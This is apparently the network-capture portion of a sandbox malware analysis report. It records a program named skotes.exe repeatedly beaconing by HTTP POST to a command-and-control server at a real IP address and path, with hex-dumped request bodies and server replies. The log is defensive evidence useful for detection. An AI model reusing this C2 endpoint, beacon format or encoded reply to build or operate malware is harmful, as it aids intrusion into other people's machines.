Dec 14, 2024 12:59:06.665993929 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 14, 2024 12:59:07.998374939 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:59:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.4	50213	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:59:09.641854048 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 14, 2024 12:59:10.998356104 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:59:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.4	50214	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:59:12.737235069 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 14, 2024 12:59:14.078485012 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:59:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.4	50215	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:59:15.712724924 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 14, 2024 12:59:17.049726009 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:59:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.4	50216	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:59:18.787585020 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 14, 2024 12:59:20.130140066 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:59:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.4	50217	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:59:21.762562037 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 14, 2024 12:59:23.109704018 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:59:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.4	50218	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:59:24.856863022 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 14, 2024 12:59:26.187937975 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:59:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.4	50219	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:59:27.815861940 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.4	50220	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:59:30.304469109 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.4	50221	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:59:31.952765942 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 14, 2024 12:59:33.291747093 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:59:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.4	50222	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:59:35.027324915 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 14, 2024 12:59:36.377649069 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:59:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.4	50223	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:59:38.002003908 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 14, 2024 12:59:39.583342075 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:59:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.4	50224	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:59:41.317966938 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 14, 2024 12:59:42.650799036 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:59:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.4	50225	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:59:44.708527088 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 14, 2024 12:59:46.047806025 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:59:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.4	50226	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:59:47.791081905 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.4	50231	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:59:49.741385937 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 14, 2024 12:59:51.181091070 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:59:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.4	50233	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:59:52.917351961 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 14, 2024 12:59:54.261898041 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:59:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.4	50234	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:59:55.891125917 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 14, 2024 12:59:57.243438959 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:59:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.4	50235	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:59:58.985351086 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 14, 2024 13:00:00.316128016 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 12:00:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.4	50236	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:00:01.960824966 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 14, 2024 13:00:03.300935030 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 12:00:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.4	50237	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:00:08.206470966 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 14, 2024 13:00:08.650327921 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 12:00:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.4	50238	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:00:10.285943985 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 14, 2024 13:00:11.633435965 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 12:00:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.4	50240	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:00:13.378586054 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 14, 2024 13:00:14.727508068 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 12:00:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.4	50241	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 13:00:16.353116989 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 14, 2024 13:00:17.714586973 CET	468	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 12:00:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 31 35 0d 0a 20 3c 63 3e 31 30 31 35 31 37 33 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 66 63 66 37 62 38 63 37 33 30 38 30 34 30 34 32 62 61 35 63 65 39 30 32 34 31 35 34 35 30 23 31 30 31 35 31 37 34 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 66 38 65 36 62 31 63 61 37 32 64 64 35 33 34 64 62 30 35 37 65 62 34 31 30 61 34 39 34 64 39 64 23 31 30 31 35 31 37 35 30 30 31 2b 2b 2b 66 63 38 66 37 